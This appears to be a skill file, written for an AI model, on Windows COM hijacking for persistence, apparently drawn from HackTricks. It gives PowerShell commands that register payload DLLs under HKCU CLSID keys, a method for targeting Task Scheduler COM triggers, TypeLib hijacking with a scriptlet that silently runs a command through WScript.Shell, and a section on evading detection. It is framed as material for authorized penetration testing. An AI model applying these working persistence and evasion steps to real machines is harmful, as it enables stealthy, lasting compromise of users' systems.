Hacktricks-skills com-hijacking
Windows COM hijacking techniques for authorized penetration testing and security research. Use this skill when the user needs to find hijackable COM components, create COM persistence mechanisms, or analyze COM-based attack vectors on Windows systems. This includes finding non-existent COM CLSIDs via ProcMon, hijacking Task Scheduler COM components, and TypeLib moniker hijacking. Always use only in authorized security testing contexts.
git clone https://github.com/abelrguezr/hacktricks-skills
skills/windows-hardening/windows-local-privilege-escalation/com-hijacking/SKILL.MDCOM Hijacking for Windows Security Testing
This skill provides techniques for identifying and exploiting COM hijacking vulnerabilities on Windows systems. COM hijacking is a powerful persistence mechanism that leverages Windows' Component Object Model registry resolution order.
Understanding COM Hijacking
Windows COM uses a registry resolution order where
HKCUHKLMRegistry Resolution Order
HKCU\Software\Classes\CLSID\{CLSID}HKLM\Software\Classes\CLSID\{CLSID}
(merged view of above)HKCR\CLSID\{CLSID}
Technique 1: Finding Non-Existent COM Components
Use Process Monitor to identify COM components that applications search for but don't exist. These are prime candidates for hijacking.
ProcMon Filter Configuration
Apply these filters in Process Monitor:
- Operation:
RegOpenKey - Result:
NAME NOT FOUND - Path: ends with
InprocServer32
This reveals COM CLSIDs that applications attempt to load but fail to find, indicating they could be created for persistence.
Creating a COM Hijack
Once you've identified a target CLSID, create the hijack entry:
# Create the CLSID key New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{TARGET-CLSID}" -Force # Create InprocServer32 with your payload path New-Item -Path "HKCU:Software\Classes\CLSID\{TARGET-CLSID}" -Name "InprocServer32" -Value "C:\path\to\payload.dll" -Force # Set the threading model New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{TARGET-CLSID}\InprocServer32" -Name "ThreadingModel" -Value "Both" -Force
Important: Be cautious about hijacking COM components that load frequently. This could cause system instability or alert detection systems.
Technique 2: Task Scheduler COM Hijacking
Windows Task Scheduler uses COM objects for custom triggers. These are predictable and often run at user logon, making them excellent persistence targets.
Finding Hijackable Task Scheduler COM Components
Use the helper script to enumerate Task Scheduler COM components:
. scripts/find-task-scheduler-com.ps1
This script identifies tasks that:
- Use COM ClassId actions
- Have enabled triggers
- Run under the Users group (S-1-5-32-545)
Analyzing Results
For each identified task, check if the CLSID exists in HKCU:
# Check if CLSID exists in HKCU (it shouldn't for a good target) Get-Item -Path "HKCU:Software\Classes\CLSID\{CLSID}" -ErrorAction SilentlyContinue # Check if it exists in HKLM (it should) Get-Item -Path "HKLM:Software\Classes\CLSID\{CLSID}" -ErrorAction SilentlyContinue
If the CLSID exists in HKLM but not HKCU, it's a viable hijacking target.
Technique 3: COM TypeLib Hijacking
Type Libraries (TypeLib) define COM interfaces and are loaded via
LoadTypeLib()Finding Target TypeLibs
Identify high-frequency CLSIDs and their associated TypeLibs:
# Example: Microsoft Web Browser control $clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}' $libid = (Get-ItemProperty -Path "Registry::HKCR\CLSID\$clsid\TypeLib").'(default)' $ver = (Get-ChildItem "Registry::HKCR\TypeLib\$libid" | Select-Object -First 1).PSChildName Write-Host "CLSID=$clsid LIBID=$libid VER=$ver"
Creating a TypeLib Hijack
Use the helper script to create a TypeLib hijack:
. scripts/create-typelib-hijack.ps1 -LibId "{LIBID}" -Version "{VERSION}" -ScriptPath "C:\path\to\payload.sct"
Scriptlet Format
Create a minimal JScript scriptlet (
.sct<?xml version="1.0"?> <scriptlet> <registration progid="UpdateSrv" classid="{F0001111-0000-0000-0000-0000F00D0001}" description="UpdateSrv"/> <script language="JScript"> <![CDATA[ try { var sh = new ActiveXObject('WScript.Shell'); // Execute your payload var cmd = 'cmd.exe /K your-command-here'; sh.Run(cmd, 0, false); } catch(e) {} ]]> </script> </scriptlet>
Triggering
The scriptlet executes when:
- Internet Explorer opens
- Applications embedding WebBrowser control load
- Explorer.exe performs certain operations
- Any application loads the hijacked TypeLib
Cleanup Procedures
Always clean up after testing:
# Remove COM hijack Remove-Item -Recurse -Force "HKCU:Software\Classes\CLSID\{CLSID}" 2>$null # Remove TypeLib hijack Remove-Item -Recurse -Force "HKCU:Software\Classes\TypeLib\{LIBID}\{VERSION}" 2>$null # Remove dropped files Remove-Item -Force "C:\path\to\payload.sct" 2>$null Remove-Item -Force "C:\path\to\payload.dll" 2>$null
Detection Evasion Considerations
- Timing: Avoid hijacking components that load too frequently
- Legitimacy: Use CLSIDs that are commonly present on systems
- Stealth: TypeLib hijacking is less commonly detected than direct COM hijacking
- 64-bit systems: Populate both
andwin32
subkeys for comprehensive coveragewin64
Common Target CLSIDs
| CLSID | Component | Frequency |
|---|---|---|
| Microsoft Web Browser | High |
| MsCtfMonitor | Medium |
| Task Scheduler | Medium |
References
- Hijack the TypeLib – New COM persistence technique (CICADA8)
- Check Point Research – ZipLine Campaign
- HackTricks - COM Hijacking
Helper Scripts
- Enumerate hijackable Task Scheduler COM componentsscripts/find-task-scheduler-com.ps1
- Create TypeLib moniker hijacksscripts/create-typelib-hijack.ps1
- Parse ProcMon logs for hijackable COM componentsscripts/find-com-hijacks.ps1
- Create standard COM hijack entriesscripts/create-com-hijack.ps1